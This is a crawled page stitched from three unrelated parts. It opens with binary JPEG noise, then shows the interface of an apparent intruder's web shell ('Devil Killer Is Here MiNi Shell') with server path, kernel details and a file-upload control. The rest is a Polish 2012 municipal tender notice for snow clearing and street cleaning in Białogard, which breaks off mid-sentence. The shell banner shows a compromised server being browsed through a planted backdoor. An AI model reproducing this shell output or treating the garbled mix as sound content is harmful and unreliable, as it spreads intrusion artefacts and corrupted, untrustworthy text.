JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121022/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121022/409692-N-2012.html

<p class="kh_header"><b>Białogard: Usługi związane z prowadzeniem akcji zimowej na ulicach i chodnikach miasta Białogard w sezonie 2012/2013</b><br>
<b>Numer ogłoszenia: 409692 - 2012; data zamieszczenia: 22.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Białogard - Urząd Miasta Białogardu , ul. 1-go Maja 18, 78-200 Białogard, woj. zachodniopomorskie, tel. 094 3122310, faks 094 3122919.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bialogard.info</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi związane z prowadzeniem akcji zimowej na ulicach i chodnikach miasta Białogard w sezonie 2012/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są usługi związane z prowadzeniem akcji zimowej na ulicach i chodnikach miasta Białogard w sezonie 2012/2013. 
2.	Szczegółowy zakres zamówienia obejmuje:
1)	utrzymanie chodników, w tym:
a)	odśnieżanie chodników;
b)	likwidację śliskości zimowej (gołoledzi), poprzez posypywanie chodników, placów i parkingów materiałami uszorstaniającymi - materiały te zapewnia Wykonawca;
c)	zimowe utrzymanie przystanków;
d)	wywóz zwałów nagromadzonego śniegu;
e)	zebranie z chodników, placów i parkingów nagromadzonych materiałów uszorstniających (piasku pozostałego po posypywaniu chodników).
f)	skuwanie z lodu chodników i kratek kanalizacji deszczowej.
2)	w przypadku braku opadów śnieżnych bieżące utrzymanie czystości na terenie miasta obejmujące 
w szczególności:
-usuwanie nieczystości wzdłuż krawężników, oraz na szerokość 75 cm w stronę osi jezdni 
(w razie wystąpienia konieczności usuwanie zanieczyszczeń z całej szerokości jezdni),
-usuwanie odpadów komunalnych z chodników, placów,  parkingów oraz terenów zieleni miejskiej leżących bezpośrednio przy chodnikach,
-opróżnianie koszy na śmieci,
-usuwanie zwłok zwierzęcych z obszaru miasta Białogard,
-zebranie liści jesienne i wiosenne oraz wywóz na kompostownik,
-opróżnianie koszy na odpady, zbieranie odpadów oraz zamiatanie 28 przystanków autobusowych, 3 pętli autobusowych i 34 zatok autobusowych,
Wykaz chodników i placów podlegających odśnieżaniu zamieszczono w załączniku A, natomiast terenów podlegających oczyszczaniu (w przypadku braku opadów śnieżnych) zamieszczono 
w załączniku B, wykaz przystanków stanowi załącznik C.
3)	utrzymanie ulic, w tym:
a)	odśnieżanie jezdni;
b)	likwidacja śliskości zimowej (gołoledzi), poprzez posypywanie jezdni materiałami uszorstaniającymi - materiały te zapewnia Wykonawca;
c)	wywóz zwałów nagromadzonego śniegu.
Wykaz ulic podlegających odśnieżaniu zamieszczono w załączniku D.
3.	Dodatkowe wymogi:
1)	Odśnieżanie ulic i chodników powinno odbywać się w taki sposób aby przejścia dla pieszych nie były blokowane zwałami śniegu, umożliwiając swobodne przechodzenie pieszych przez ulice.
2)	Wymagany ilościowy skład mieszanki solno-piaskowej musi zawierać 25% soli, natomiast zużycie mieszanki w ilości 100 g na 1 m 2 powierzchni.
3)	Sprzątanie chodników odbywać się będzie każdego dnia tygodnia z wyjątkiem niedziel i świąt,
 od godziny 5:00 tylko w przypadku braku śniegu na ulicach i chodnikach oraz po uprzednim ustaleniu czynności z Zamawiającym. 
4)	Odśnieżanie chodników odbywać się będzie od godziny 5:00. Dodatkowe wykonywanie czynności 
(w razie nasilenia opadów powodujących konieczność powtórnego odśnieżenia ) odbywać się będzie:
-w dni robocze (od poniedziałki do piątku) - na pisemnie, telefoniczne lub  faxem - polecenie Zamawiającego, 
-w soboty, niedziele i święta - na podstawie uzasadnionej decyzji Wykonawcy po uprzednim telefonicznym powiadomieniu przedstawiciela Zamawiającego.
5)	W przypadku odśnieżania ulic czynności wykonywane będą od godziny 4:00, z zastrzeżeniem, że po raz pierwszy wykonywanie czynności objętych zamówieniem rozpocznie się po uprzednim zawiadomieniu Wykonawcy przez Zamawiającego. Dodatkowe wykonywanie czynności  (w razie nasilenia opadów powodujących konieczność powtórnego odśnieżenia) odbywać się będzie:
-w dni robocze (od poniedziałku do piątku) - na pisemnie , telefoniczne lub  faxem - polecenie Zamawiającego, 
-w soboty, niedziele i święta - na podstawie uzasadnionej decyzji Wykonawcy po uprzednim telefonicznym powiadomieniu przedstawiciela Zamawiającego.
6)	Padłe zwierzęta z terenu miasta Białogard usuwane będą na podstawie odrębnego zlecenia a ich zwłoki utylizowane w Zakładzie Struga S.A. Punkt Pozyskiwania i Przeładunku Surowców Utylizacyjnych w Karlinie, ul. Kołobrzeska 13, lub podobnym, na potwierdzenie czego Zamawiającemu okazywane będzie poświadczenie ich utylizacji.
7)	W przypadku nagromadzenia się znacznej ilości śniegu zgarniętego z chodników, placów i jezdni utrudniającego ruch pojazdów i pieszych, decyzję o jego usunięciu podejmie Zamawiający, 
a Wykonawca zobowiązany jest usunąć i wywieźć śnieg na miejsce wskazane przez Zamawiającego. 
8)	Zamawiający określi czas i miejsca zbierania nagromadzonych materiałów uszorstniających.
9)	Zamawiający zastrzega sobie posiadanie z Wykonawcą łączności (telefon, telefon komórkowy, fax) 
o każdej porze dnia i nocy.
10)	Zamawiający zastrzega sobie prawo do zawieszenia trwania akcji zimowej (utrzymania w gotowości sprzętu do akcji zimowej), jeżeli warunki pogodowe będą korzystne oraz temperatura dodatnia, przez okres 3 dni, bez ponoszenia dodatkowych kosztów z tytułu zawieszenia akcji.
11)	Przed podpisaniem umowy Wykonawca złoży Zamawiającemu harmonogram prac:
a) chodniki: osobno na odśnieżanie i osobno na sprzątanie w przypadku braku śniegu,
b) ulice: na odśnieżanie.
12)	Wykonawca (w przypadku utrzymania chodników) zobowiązany jest do prowadzenia dokumentacji, na podstawie której przedłoży na koniec okresu realizacji umowy informacje dotyczące ilości zebranych zmieszanych odpadów komunalnych oraz poszczególnych rodzajów selektywnie zebranych odpadów komunalnych i sposobu ich zagospodarowania, w tym ulegających biodegradacji (liście), poprzez wskazanie miejsca ich przeznaczenia.
4.	Nazwy i kody Wspólnego Słownika Zamówień (CPV): 90620000-9, 90630000-2, 90610000-6..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających o wartości nie większej niż 20% wartości zamówienia podstawowego. Zamówieniem uzupełniającym objęte będą usługi przewidziane do wykonania w zamówieniu podstawowym.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2, 90.61.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek do spełnienia dla zadania nr 1
Opis sposobu dokonywania oceny spełniania warunku - warunek zostanie uznany za spełniony, jeżeli wykonawca, w przypadku składania oferty dot. odśnieżania chodników, wykaże, że posiada zezwolenie wydane przez Burmistrza Białogardu na prowadzenie działalności w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości ważne na czas trwania zamówienia lub umowę z odbiorcą posiadającym takie zezwolenie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunki odrębne dla każdego z zadań
Opis sposobu dokonywania oceny spełniania warunku - warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał należycie co najmniej  2 zamówienia o wartości brutto:
- w przypadku składania oferty dotyczącej odśnieżania chodników (zadanie nr 1): 75.000,00 zł każde,
- w przypadku składania oferty dotyczącej odśnieżania ulic (zadanie nr 2): 75.000,00 zł każde,
- w przypadku składania oferty przez jednego Wykonawcę na dwie części zamówienia (odśnieżanie chodników i ulic): 150.000,00 zł każde
odpowiadające swoim rodzajem usłudze stanowiącej przedmiot zamówienia. Przez  zamówienia odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia Zamawiający uzna wykonanie usług związanych z odśnieżaniem chodników i ulic.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunki odrębne dla każdego z zadań
Opis sposobu dokonywania oceny spełniania warunku - warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował:
-w przypadku składania oferty dotyczącej odśnieżania chodników (zadanie nr 1): min. 3 ciągniki 
lub inne pojazdy z przyczepami, min. 3 pługi, min. 3 piaskarki, min 8 wózków na piasek, zmiotki 
i odpady, pozostały sprzęt typu łopaty do śniegu, miotły, skuwaki do lodu, itp.
-w przypadku składania oferty dotyczącej odśnieżania ulic (zadanie nr 2): min. 4 ciągniki lub inne pojazdy z przyczepami, min. 4 pługi, min. 4 piaskarki;
-w przypadku składania ofert przez jednego Wykonawcę na dwie części zamówienia (odśnieżanie chodników i ulic) należy posiadać wymagany sprzęt w ilości łącznej tj.: min. 7 ciągników lub innych pojazdów z przyczepami, min. 7 pługów, min. 7 piaskarek, min 8 wózków na piasek, zmiotki 
i odpady, pozostały sprzęt typu łopaty do śniegu, miotły, skuwaki do lodu, itp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunki odrębne dla każdego 
z zadań,
Opis sposobu dokonywania oceny spełniania warunku - warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował:
-w przypadku składania oferty dotyczącej odśnieżania chodników (zadanie nr 1): 10 osobami zdolnymi do wykonania przedmiotu zamówienia, w tym co najmniej 3 osobami  posiadającymi uprawnienia do kierowania ciągnikiem lub innym pojazdem z przyczepą,
-w przypadku składania oferty dotyczącej odśnieżania ulic (zadanie nr 2): 8 osobami zdolnymi 
do wykonania przedmiotu zamówienia, w tym co najmniej 4 osobami posiadającymi uprawnienia 
do kierowania ciągnikiem lub innym pojazdem z przyczepą,
-w przypadku składania ofert przez jednego Wykonawcę na dwie części zamówienia (odśnieżanie chodników i ulic): 18 osobami zdolnymi do wykonania przedmiotu zamówienia, w tym co najmniej 7 osobami  posiadającymi uprawnienia do kierowania ciągnikiem lub innym pojazdem z przyczepą.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek do spełnienia dla obu zadań,
Opis sposobu dokonywania oceny spełniania warunku: warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 100 000,00 zł (jeżeli ubezpieczenie nie obejmuje całego okresu objętego zamówieniem Wykonawca zobowiązuje się do dostarczenia dla Zamawiającego najpóźniej 7 dni przed wygaśnięciem poprzedniej polisy, kserokopii poświadczonej za zgodność z oryginałem nowej polisy ubezpieczeniowej przedłużającej okres ubezpieczenia z zachowaniem ciągłości ubezpieczenia).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.bialogard.info/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miasto Białogard - Urząd Miasta Białogard 
ul. 1-go Maja 18 
78-200 Białogard 
biuro nr 216.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.10.2012 godzina 09:00, miejsce: Miasto Białogard - Urząd Miasta Białogard 
ul. 1-go Maja 18 
78-200 Białogard 
biuro 224.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> utrzymanie chodników.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	odśnieżanie chodników;
b)	likwidację śliskości zimowej (gołoledzi), poprzez posypywanie chodników, placów i parkingów materiałami uszorstaniającymi - materiały te zapewnia Wykonawca;
c)	zimowe utrzymanie przystanków;
d)	wywóz zwałów nagromadzonego śniegu;
e)	zebranie z chodników, placów i parkingów nagromadzonych materiałów uszorstniających (piasku pozostałego po posypywaniu chodników).
f)	skuwanie z lodu chodników i kratek kanalizacji deszczowej.
2)	w przypadku braku opadów śnieżnych bieżące utrzymanie czystości na terenie miasta obejmujące 
w szczególności:
-usuwanie nieczystości wzdłuż krawężników, oraz na szerokość 75 cm w stronę osi jezdni 
(w razie wystąpienia konieczności usuwanie zanieczyszczeń z całej szerokości jezdni),
-usuwanie odpadów komunalnych z chodników, placów,  parkingów oraz terenów zieleni miejskiej leżących bezpośrednio przy chodnikach,
-opróżnianie koszy na śmieci,
-usuwanie zwłok zwierzęcych z obszaru miasta Białogard,
-zebranie liści jesienne i wiosenne oraz wywóz na kompostownik,
-opróżnianie koszy na odpady, zbieranie odpadów oraz zamiatanie 28 przystanków autobusowych, 3 pętli autobusowych i 34 zatok autobusowych,
	Wykaz chodników i placów podlegających odśnieżaniu zamieszczono w załączniku A, natomiast terenów podlegających oczyszczaniu (w przypadku braku opadów śnieżnych) zamieszczono 
w załączniku B, wykaz przystanków stanowi załącznik C.
Dodatkowe wymogi: 1) Odśnieżanie ulic i chodników powinno odbywać się w taki sposób aby przejścia dla pieszych nie były blokowane zwałami śniegu, umożliwiając swobodne przechodzenie pieszych przez ulice. 2) Wymagany ilościowy skład mieszanki solno-piaskowej musi zawierać 25% soli, natomiast zużycie mieszanki w ilości 100 g na 1 m 2 powierzchni. 3) Sprzątanie chodników odbywać się będzie każdego dnia tygodnia z wyjątkiem niedziel i świąt, od godziny 5:00 tylko w przypadku braku śniegu na ulicach i chodnikach oraz po uprzednim ustaleniu czynności z Zamawiającym. 4) Odśnieżanie chodników odbywać się będzie od godziny 5:00. Dodatkowe wykonywanie czynności (w razie nasilenia opadów powodujących konieczność powtórnego odśnieżenia ) odbywać się będzie: -w dni robocze (od poniedziałki do piątku) - na pisemnie, telefoniczne lub faxem - polecenie 